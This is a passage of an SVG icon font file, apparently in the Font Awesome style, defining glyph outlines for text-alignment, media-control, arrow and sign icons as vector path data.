d="M1744 128q33 0 42 -18.5t-11 -44.5l-126 -162q-20 -26 -49 -26t-49 26l-126 162q-20 26 -11 44.5t42 18.5h80v1024h-80q-33 0 -42 18.5t11 44.5l126 162q20 26 49 26t49 -26l126 -162q20 -26 11 -44.5t-42 -18.5h-80v-1024h80zM81 1407l54 -27q12 -5 211 -5q44 0 132 2
t132 2q36 0 107.5 -0.5t107.5 -0.5h293q6 0 21 -0.5t20.5 0t16 3t17.5 9t15 17.5l42 1q4 0 14 -0.5t14 -0.5q2 -112 2 -336q0 -80 -5 -109q-39 -14 -68 -18q-25 44 -54 128q-3 9 -11 48t-14.5 73.5t-7.5 35.5q-6 8 -12 12.5t-15.5 6t-13 2.5t-18 0.5t-16.5 -0.5
q-17 0 -66.5 0.5t-74.5 0.5t-64 -2t-71 -6q-9 -81 -8 -136q0 -94 2 -388t2 -455q0 -16 -2.5 -71.5t0 -91.5t12.5 -69q40 -21 124 -42.5t120 -37.5q5 -40 5 -50q0 -14 -3 -29l-34 -1q-76 -2 -218 8t-207 10q-50 0 -151 -9t-152 -9q-3 51 -3 52v9q17 27 61.5 43t98.5 29t78 27
q19 42 19 383q0 101 -3 303t-3 303v117q0 2 0.5 15.5t0.5 25t-1 25.5t-3 24t-5 14q-11 12 -162 12q-33 0 -93 -12t-80 -26q-19 -13 -34 -72.5t-31.5 -111t-42.5 -53.5q-42 26 -56 44v383z" />
    <glyph glyph-name="text_width" unicode="&#xf035;" 
d="M81 1407l54 -27q12 -5 211 -5q44 0 132 2t132 2q70 0 246.5 1t304.5 0.5t247 -4.5q33 -1 56 31l42 1q4 0 14 -0.5t14 -0.5q2 -112 2 -336q0 -80 -5 -109q-39 -14 -68 -18q-25 44 -54 128q-3 9 -11 47.5t-15 73.5t-7 36q-10 13 -27 19q-5 2 -66 2q-30 0 -93 1t-103 1
t-94 -2t-96 -7q-9 -81 -8 -136l1 -152v52q0 -55 1 -154t1.5 -180t0.5 -153q0 -16 -2.5 -71.5t0 -91.5t12.5 -69q40 -21 124 -42.5t120 -37.5q5 -40 5 -50q0 -14 -3 -29l-34 -1q-76 -2 -218 8t-207 10q-50 0 -151 -9t-152 -9q-3 51 -3 52v9q17 27 61.5 43t98.5 29t78 27
q7 16 11.5 74t6 145.5t1.5 155t-0.5 153.5t-0.5 89q0 7 -2.5 21.5t-2.5 22.5q0 7 0.5 44t1 73t0 76.5t-3 67.5t-6.5 32q-11 12 -162 12q-41 0 -163 -13.5t-138 -24.5q-19 -12 -34 -71.5t-31.5 -111.5t-42.5 -54q-42 26 -56 44v383zM1310 125q12 0 42 -19.5t57.5 -41.5
t59.5 -49t36 -30q26 -21 26 -49t-26 -49q-4 -3 -36 -30t-59.5 -49t-57.5 -41.5t-42 -19.5q-13 0 -20.5 10.5t-10 28.5t-2.5 33.5t1.5 33t1.5 19.5h-1024q0 -2 1.5 -19.5t1.5 -33t-2.5 -33.5t-10 -28.5t-20.5 -10.5q-12 0 -42 19.5t-57.5 41.5t-59.5 49t-36 30q-26 21 -26 49
t26 49q4 3 36 30t59.5 49t57.5 41.5t42 19.5q13 0 20.5 -10.5t10 -28.5t2.5 -33.5t-1.5 -33t-1.5 -19.5h1024q0 2 -1.5 19.5t-1.5 33t2.5 33.5t10 28.5t20.5 10.5z" />
    <glyph glyph-name="align_left" unicode="&#xf036;" horiz-adv-x="1792" 
d="M1792 192v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1408 576v-128q0 -26 -19 -45t-45 -19h-1280q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1280q26 0 45 -19t19 -45zM1664 960v-128q0 -26 -19 -45
t-45 -19h-1536q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1536q26 0 45 -19t19 -45zM1280 1344v-128q0 -26 -19 -45t-45 -19h-1152q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1152q26 0 45 -19t19 -45z" />
    <glyph glyph-name="align_center" unicode="&#xf037;" horiz-adv-x="1792" 
d="M1792 192v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1408 576v-128q0 -26 -19 -45t-45 -19h-896q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h896q26 0 45 -19t19 -45zM1664 960v-128q0 -26 -19 -45t-45 -19
h-1408q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1408q26 0 45 -19t19 -45zM1280 1344v-128q0 -26 -19 -45t-45 -19h-640q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h640q26 0 45 -19t19 -45z" />
    <glyph glyph-name="align_right" unicode="&#xf038;" horiz-adv-x="1792" 
d="M1792 192v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 576v-128q0 -26 -19 -45t-45 -19h-1280q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1280q26 0 45 -19t19 -45zM1792 960v-128q0 -26 -19 -45
t-45 -19h-1536q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1536q26 0 45 -19t19 -45zM1792 1344v-128q0 -26 -19 -45t-45 -19h-1152q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1152q26 0 45 -19t19 -45z" />
    <glyph glyph-name="align_justify" unicode="&#xf039;" horiz-adv-x="1792" 
d="M1792 192v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 576v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 960v-128q0 -26 -19 -45
t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 1344v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45z" />
    <glyph glyph-name="list" unicode="&#xf03a;" horiz-adv-x="1792" 
d="M256 224v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-192q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h192q13 0 22.5 -9.5t9.5 -22.5zM256 608v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-192q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h192q13 0 22.5 -9.5
t9.5 -22.5zM256 992v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-192q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h192q13 0 22.5 -9.5t9.5 -22.5zM1792 224v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1344q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1344
q13 0 22.5 -9.5t9.5 -22.5zM256 1376v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-192q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h192q13 0 22.5 -9.5t9.5 -22.5zM1792 608v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1344q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5
t22.5 9.5h1344q13 0 22.5 -9.5t9.5 -22.5zM1792 992v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1344q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1344q13 0 22.5 -9.5t9.5 -22.5zM1792 1376v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1344q-13 0 -22.5 9.5t-9.5 22.5v192
q0 13 9.5 22.5t22.5 9.5h1344q13 0 22.5 -9.5t9.5 -22.5z" />
    <glyph glyph-name="indent_left" unicode="&#xf03b;" horiz-adv-x="1792" 
d="M384 992v-576q0 -13 -9.5 -22.5t-22.5 -9.5q-14 0 -23 9l-288 288q-9 9 -9 23t9 23l288 288q9 9 23 9q13 0 22.5 -9.5t9.5 -22.5zM1792 224v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1728q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1728q13 0 22.5 -9.5
t9.5 -22.5zM1792 608v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1088q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1088q13 0 22.5 -9.5t9.5 -22.5zM1792 992v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1088q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1088
q13 0 22.5 -9.5t9.5 -22.5zM1792 1376v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1728q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1728q13 0 22.5 -9.5t9.5 -22.5z" />
    <glyph glyph-name="indent_right" unicode="&#xf03c;" horiz-adv-x="1792" 
d="M352 704q0 -14 -9 -23l-288 -288q-9 -9 -23 -9q-13 0 -22.5 9.5t-9.5 22.5v576q0 13 9.5 22.5t22.5 9.5q14 0 23 -9l288 -288q9 -9 9 -23zM1792 224v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1728q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1728q13 0 22.5 -9.5
t9.5 -22.5zM1792 608v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1088q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1088q13 0 22.5 -9.5t9.5 -22.5zM1792 992v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1088q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1088
q13 0 22.5 -9.5t9.5 -22.5zM1792 1376v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1728q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1728q13 0 22.5 -9.5t9.5 -22.5z" />
    <glyph glyph-name="facetime_video" unicode="&#xf03d;" horiz-adv-x="1792" 
d="M1792 1184v-1088q0 -42 -39 -59q-13 -5 -25 -5q-27 0 -45 19l-403 403v-166q0 -119 -84.5 -203.5t-203.5 -84.5h-704q-119 0 -203.5 84.5t-84.5 203.5v704q0 119 84.5 203.5t203.5 84.5h704q119 0 203.5 -84.5t84.5 -203.5v-165l403 402q18 19 45 19q12 0 25 -5
q39 -17 39 -59z" />
    <glyph glyph-name="picture" unicode="&#xf03e;" horiz-adv-x="1920" 
d="M640 960q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM1664 576v-448h-1408v192l320 320l160 -160l512 512zM1760 1280h-1600q-13 0 -22.5 -9.5t-9.5 -22.5v-1216q0 -13 9.5 -22.5t22.5 -9.5h1600q13 0 22.5 9.5t9.5 22.5v1216
q0 13 -9.5 22.5t-22.5 9.5zM1920 1248v-1216q0 -66 -47 -113t-113 -47h-1600q-66 0 -113 47t-47 113v1216q0 66 47 113t113 47h1600q66 0 113 -47t47 -113z" />
    <glyph glyph-name="pencil" unicode="&#xf040;" 
d="M363 0l91 91l-235 235l-91 -91v-107h128v-128h107zM886 928q0 22 -22 22q-10 0 -17 -7l-542 -542q-7 -7 -7 -17q0 -22 22 -22q10 0 17 7l542 542q7 7 7 17zM832 1120l416 -416l-832 -832h-416v416zM1515 1024q0 -53 -37 -90l-166 -166l-416 416l166 165q36 38 90 38
q53 0 91 -38l235 -234q37 -39 37 -91z" />
    <glyph glyph-name="map_marker" unicode="&#xf041;" horiz-adv-x="1024" 
d="M768 896q0 106 -75 181t-181 75t-181 -75t-75 -181t75 -181t181 -75t181 75t75 181zM1024 896q0 -109 -33 -179l-364 -774q-16 -33 -47.5 -52t-67.5 -19t-67.5 19t-46.5 52l-365 774q-33 70 -33 179q0 212 150 362t362 150t362 -150t150 -362z" />
    <glyph glyph-name="adjust" unicode="&#xf042;" 
d="M768 96v1088q-148 0 -273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="tint" unicode="&#xf043;" horiz-adv-x="1024" 
d="M512 384q0 36 -20 69q-1 1 -15.5 22.5t-25.5 38t-25 44t-21 50.5q-4 16 -21 16t-21 -16q-7 -23 -21 -50.5t-25 -44t-25.5 -38t-15.5 -22.5q-20 -33 -20 -69q0 -53 37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1024 512q0 -212 -150 -362t-362 -150t-362 150t-150 362
q0 145 81 275q6 9 62.5 90.5t101 151t99.5 178t83 201.5q9 30 34 47t51 17t51.5 -17t33.5 -47q28 -93 83 -201.5t99.5 -178t101 -151t62.5 -90.5q81 -127 81 -275z" />
    <glyph glyph-name="edit" unicode="&#xf044;" horiz-adv-x="1792" 
d="M888 352l116 116l-152 152l-116 -116v-56h96v-96h56zM1328 1072q-16 16 -33 -1l-350 -350q-17 -17 -1 -33t33 1l350 350q17 17 1 33zM1408 478v-190q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h832
q63 0 117 -25q15 -7 18 -23q3 -17 -9 -29l-49 -49q-14 -14 -32 -8q-23 6 -45 6h-832q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832q66 0 113 47t47 113v126q0 13 9 22l64 64q15 15 35 7t20 -29zM1312 1216l288 -288l-672 -672h-288v288zM1756 1084l-92 -92
l-288 288l92 92q28 28 68 28t68 -28l152 -152q28 -28 28 -68t-28 -68z" />
    <glyph glyph-name="share" unicode="&#xf045;" horiz-adv-x="1664" 
d="M1408 547v-259q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h255v0q13 0 22.5 -9.5t9.5 -22.5q0 -27 -26 -32q-77 -26 -133 -60q-10 -4 -16 -4h-112q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832
q66 0 113 47t47 113v214q0 19 18 29q28 13 54 37q16 16 35 8q21 -9 21 -29zM1645 1043l-384 -384q-18 -19 -45 -19q-12 0 -25 5q-39 17 -39 59v192h-160q-323 0 -438 -131q-119 -137 -74 -473q3 -23 -20 -34q-8 -2 -12 -2q-16 0 -26 13q-10 14 -21 31t-39.5 68.5t-49.5 99.5
t-38.5 114t-17.5 122q0 49 3.5 91t14 90t28 88t47 81.5t68.5 74t94.5 61.5t124.5 48.5t159.5 30.5t196.5 11h160v192q0 42 39 59q13 5 25 5q26 0 45 -19l384 -384q19 -19 19 -45t-19 -45z" />
    <glyph glyph-name="check" unicode="&#xf046;" horiz-adv-x="1664" 
d="M1408 606v-318q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h832q63 0 117 -25q15 -7 18 -23q3 -17 -9 -29l-49 -49q-10 -10 -23 -10q-3 0 -9 2q-23 6 -45 6h-832q-66 0 -113 -47t-47 -113v-832
q0 -66 47 -113t113 -47h832q66 0 113 47t47 113v254q0 13 9 22l64 64q10 10 23 10q6 0 12 -3q20 -8 20 -29zM1639 1095l-814 -814q-24 -24 -57 -24t-57 24l-430 430q-24 24 -24 57t24 57l110 110q24 24 57 24t57 -24l263 -263l647 647q24 24 57 24t57 -24l110 -110
q24 -24 24 -57t-24 -57z" />
    <glyph glyph-name="move" unicode="&#xf047;" horiz-adv-x="1792" 
d="M1792 640q0 -26 -19 -45l-256 -256q-19 -19 -45 -19t-45 19t-19 45v128h-384v-384h128q26 0 45 -19t19 -45t-19 -45l-256 -256q-19 -19 -45 -19t-45 19l-256 256q-19 19 -19 45t19 45t45 19h128v384h-384v-128q0 -26 -19 -45t-45 -19t-45 19l-256 256q-19 19 -19 45
t19 45l256 256q19 19 45 19t45 -19t19 -45v-128h384v384h-128q-26 0 -45 19t-19 45t19 45l256 256q19 19 45 19t45 -19l256 -256q19 -19 19 -45t-19 -45t-45 -19h-128v-384h384v128q0 26 19 45t45 19t45 -19l256 -256q19 -19 19 -45z" />
    <glyph glyph-name="step_backward" unicode="&#xf048;" horiz-adv-x="1024" 
d="M979 1395q19 19 32 13t13 -32v-1472q0 -26 -13 -32t-32 13l-710 710q-9 9 -13 19v-678q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-678q4 10 13 19z" />
    <glyph glyph-name="fast_backward" unicode="&#xf049;" horiz-adv-x="1792" 
d="M1747 1395q19 19 32 13t13 -32v-1472q0 -26 -13 -32t-32 13l-710 710q-9 9 -13 19v-710q0 -26 -13 -32t-32 13l-710 710q-9 9 -13 19v-678q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-678q4 10 13 19l710 710
q19 19 32 13t13 -32v-710q4 10 13 19z" />
    <glyph glyph-name="backward" unicode="&#xf04a;" horiz-adv-x="1664" 
d="M1619 1395q19 19 32 13t13 -32v-1472q0 -26 -13 -32t-32 13l-710 710q-9 9 -13 19v-710q0 -26 -13 -32t-32 13l-710 710q-19 19 -19 45t19 45l710 710q19 19 32 13t13 -32v-710q4 10 13 19z" />
    <glyph glyph-name="play" unicode="&#xf04b;" horiz-adv-x="1408" 
d="M1384 609l-1328 -738q-23 -13 -39.5 -3t-16.5 36v1472q0 26 16.5 36t39.5 -3l1328 -738q23 -13 23 -31t-23 -31z" />
    <glyph glyph-name="pause" unicode="&#xf04c;" 
d="M1536 1344v-1408q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h512q26 0 45 -19t19 -45zM640 1344v-1408q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h512q26 0 45 -19t19 -45z" />
    <glyph glyph-name="stop" unicode="&#xf04d;" 
d="M1536 1344v-1408q0 -26 -19 -45t-45 -19h-1408q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h1408q26 0 45 -19t19 -45z" />
    <glyph glyph-name="forward" unicode="&#xf04e;" horiz-adv-x="1664" 
d="M45 -115q-19 -19 -32 -13t-13 32v1472q0 26 13 32t32 -13l710 -710q9 -9 13 -19v710q0 26 13 32t32 -13l710 -710q19 -19 19 -45t-19 -45l-710 -710q-19 -19 -32 -13t-13 32v710q-4 -10 -13 -19z" />
    <glyph glyph-name="fast_forward" unicode="&#xf050;" horiz-adv-x="1792" 
d="M45 -115q-19 -19 -32 -13t-13 32v1472q0 26 13 32t32 -13l710 -710q9 -9 13 -19v710q0 26 13 32t32 -13l710 -710q9 -9 13 -19v678q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-1408q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v678q-4 -10 -13 -19l-710 -710
q-19 -19 -32 -13t-13 32v710q-4 -10 -13 -19z" />
    <glyph glyph-name="step_forward" unicode="&#xf051;" horiz-adv-x="1024" 
d="M45 -115q-19 -19 -32 -13t-13 32v1472q0 26 13 32t32 -13l710 -710q9 -9 13 -19v678q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-1408q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v678q-4 -10 -13 -19z" />
    <glyph glyph-name="eject" unicode="&#xf052;" horiz-adv-x="1538" 
d="M14 557l710 710q19 19 45 19t45 -19l710 -710q19 -19 13 -32t-32 -13h-1472q-26 0 -32 13t13 32zM1473 0h-1408q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h1408q26 0 45 -19t19 -45v-256q0 -26 -19 -45t-45 -19z" />
    <glyph glyph-name="chevron_left" unicode="&#xf053;" horiz-adv-x="1280" 
d="M1171 1235l-531 -531l531 -531q19 -19 19 -45t-19 -45l-166 -166q-19 -19 -45 -19t-45 19l-742 742q-19 19 -19 45t19 45l742 742q19 19 45 19t45 -19l166 -166q19 -19 19 -45t-19 -45z" />
    <glyph glyph-name="chevron_right" unicode="&#xf054;" horiz-adv-x="1280" 
d="M1107 659l-742 -742q-19 -19 -45 -19t-45 19l-166 166q-19 19 -19 45t19 45l531 531l-531 531q-19 19 -19 45t19 45l166 166q19 19 45 19t45 -19l742 -742q19 -19 19 -45t-19 -45z" />
    <glyph glyph-name="plus_sign" unicode="&#xf055;" 
d="M1216 576v128q0 26 -19 45t-45 19h-256v256q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-256h-256q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h256v-256q0 -26 19 -45t45 -19h128q26 0 45 19t19 45v256h256q26 0 45 19t19 45zM1536 640q0 -209 -103 -385.5
t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="minus_sign" unicode="&#xf056;" 
d="M1216 576v128q0 26 -19 45t-45 19h-768q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h768q26 0 45 19t19 45zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5
t103 -385.5z" />
    <glyph glyph-name="remove_sign" unicode="&#xf057;" 
d="M1149 414q0 26 -19 45l-181 181l181 181q19 19 19 45q0 27 -19 46l-90 90q-19 19 -46 19q-26 0 -45 -19l-181 -181l-181 181q-19 19 -45 19q-27 0 -46 -19l-90 -90q-19 -19 -19 -46q0 -26 19 -45l181 -181l-181 -181q-19 -19 -19 -45q0 -27 19 -46l90 -90q19 -19 46 -19
q26 0 45 19l181 181l181 -181q19 -19 45 -19q27 0 46 19l90 90q19 19 19 46zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="ok_sign" unicode="&#xf058;" 
d="M1284 802q0 28 -18 46l-91 90q-19 19 -45 19t-45 -19l-408 -407l-226 226q-19 19 -45 19t-45 -19l-91 -90q-18 -18 -18 -46q0 -27 18 -45l362 -362q19 -19 45 -19q27 0 46 19l543 543q18 18 18 45zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103
t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="question_sign" unicode="&#xf059;" 
d="M896 160v192q0 14 -9 23t-23 9h-192q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h192q14 0 23 9t9 23zM1152 832q0 88 -55.5 163t-138.5 116t-170 41q-243 0 -371 -213q-15 -24 8 -42l132 -100q7 -6 19 -6q16 0 25 12q53 68 86 92q34 24 86 24q48 0 85.5 -26t37.5 -59
q0 -38 -20 -61t-68 -45q-63 -28 -115.5 -86.5t-52.5 -125.5v-36q0 -14 9 -23t23 -9h192q14 0 23 9t9 23q0 19 21.5 49.5t54.5 49.5q32 18 49 28.5t46 35t44.5 48t28 60.5t12.5 81zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5
t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="info_sign" unicode="&#xf05a;" 
d="M1024 160v160q0 14 -9 23t-23 9h-96v512q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-160q0 -14 9 -23t23 -9h96v-320h-96q-14 0 -23 -9t-9 -23v-160q0 -14 9 -23t23 -9h448q14 0 23 9t9 23zM896 1056v160q0 14 -9 23t-23 9h-192q-14 0 -23 -9t-9 -23v-160q0 -14 9 -23
t23 -9h192q14 0 23 9t9 23zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="screenshot" unicode="&#xf05b;" 
d="M1197 512h-109q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h109q-32 108 -112.5 188.5t-188.5 112.5v-109q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v109q-108 -32 -188.5 -112.5t-112.5 -188.5h109q26 0 45 -19t19 -45v-128q0 -26 -19 -45t-45 -19h-109
q32 -108 112.5 -188.5t188.5 -112.5v109q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-109q108 32 188.5 112.5t112.5 188.5zM1536 704v-128q0 -26 -19 -45t-45 -19h-143q-37 -161 -154.5 -278.5t-278.5 -154.5v-143q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v143
q-161 37 -278.5 154.5t-154.5 278.5h-143q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h143q37 161 154.5 278.5t278.5 154.5v143q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-143q161 -37 278.5 -154.5t154.5 -278.5h143q26 0 45 -19t19 -45z" />
    <glyph glyph-name="remove_circle" unicode="&#xf05c;" 
d="M1097 457l-146 -146q-10 -10 -23 -10t-23 10l-137 137l-137 -137q-10 -10 -23 -10t-23 10l-146 146q-10 10 -10 23t10 23l137 137l-137 137q-10 10 -10 23t10 23l146 146q10 10 23 10t23 -10l137 -137l137 137q10 10 23 10t23 -10l146 -146q10 -10 10 -23t-10 -23
l-137 -137l137 -137q10 -10 10 -23t-10 -23zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5
t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="ok_circle" unicode="&#xf05d;" 
d="M1171 723l-422 -422q-19 -19 -45 -19t-45 19l-294 294q-19 19 -19 45t19 45l102 102q19 19 45 19t45 -19l147 -147l275 275q19 19 45 19t45 -19l102 -102q19 -19 19 -45t-19 -45zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198t-73 -273t73 -273t198 -198
t273 -73t273 73t198 198t73 273zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="ban_circle" unicode="&#xf05e;" 
d="M1312 643q0 161 -87 295l-754 -753q137 -89 297 -89q111 0 211.5 43.5t173.5 116.5t116 174.5t43 212.5zM313 344l755 754q-135 91 -300 91q-148 0 -273 -73t-198 -199t-73 -274q0 -162 89 -299zM1536 643q0 -157 -61 -300t-163.5 -246t-245 -164t-298.5 -61t-298.5 61
t-245 164t-163.5 246t-61 300t61 299.5t163.5 245.5t245 164t298.5 61t298.5 -61t245 -164t163.5 -245.5t61 -299.5z" />
    <glyph glyph-name="arrow_left" unicode="&#xf060;" 
d="M1536 640v-128q0 -53 -32.5 -90.5t-84.5 -37.5h-704l293 -294q38 -36 38 -90t-38 -90l-75 -76q-37 -37 -90 -37q-52 0 -91 37l-651 652q-37 37 -37 90q0 52 37 91l651 650q38 38 91 38q52 0 90 -38l75 -74q38 -38 38 -91t-38 -91l-293 -293h704q52 0 84.5 -37.5
t32.5 -90.5z" />
    <glyph glyph-name="arrow_right" unicode="&#xf061;" 
d="M1472 576q0 -54 -37 -91l-651 -651q-39 -37 -91 -37q-51 0 -90 37l-75 75q-38 38 -38 91t38 91l293 293h-704q-52 0 -84.5 37.5t-32.5 90.5v128q0 53 32.5 90.5t84.5 37.5h704l-293 294q-38 36 -38 90t38 90l75 75q38 38 90 38q53 0 91 -38l651 -651q37 -35 37 -90z" />
    <glyph glyph-name="arrow_up" unicode="&#xf062;" horiz-adv-x="1664" 
d="M1611 565q0 -51 -37 -90l-75 -75q-38 -38 -91 -38q-54 0 -90 38l-294 293v-704q0 -52 -37.5 -84.5t-90.5 -32.5h-128q-53 0 -90.5 32.5t-37.5 84.5v704l-294 -293q-36 -38 -90 -38t-90 38l-75 75q-38 38 -38 90q0 53 38 91l651 651q35 37 90 37q54 0 91 -37l651 -651
q37 -39 37 -91z" />
    <glyph glyph-name="arrow_down" unicode="&#xf063;" horiz-adv-x="1664" 
d="M1611 704q0 -53 -37 -90l-651 -652q-39 -37 -91 -37q-53 0 -90 37l-651 652q-38 36 -38 90q0 53 38 91l74 75q39 37 91 37q53 0 90 -37l294 -294v704q0 52 38 90t90 38h128q52 0 90 -38t38 -90v-704l294 294q37 37 90 37q52 0 91 -37l75 -75q37 -39 37 -91z" />
    <glyph glyph-name="share_alt" unicode="&#xf064;" horiz-adv-x="1792" 
d="M1792 896q0 -26 -19 -45l-512 -512q-19 -19 -45 -19t-45 19t-19 45v256h-224q-98 0 -175.5 -6t-154 -21.5t-133 -42.5t-105.5 -69.5t-80 -101t-48.5 -138.5t-17.5 -181q0 -55 5 -123q0 -6 2.5 -23.5t2.5 -26.5q0 -15 -8.5 -25t-23.5 -10q-16 0 -28 17q-7 9 -13 22
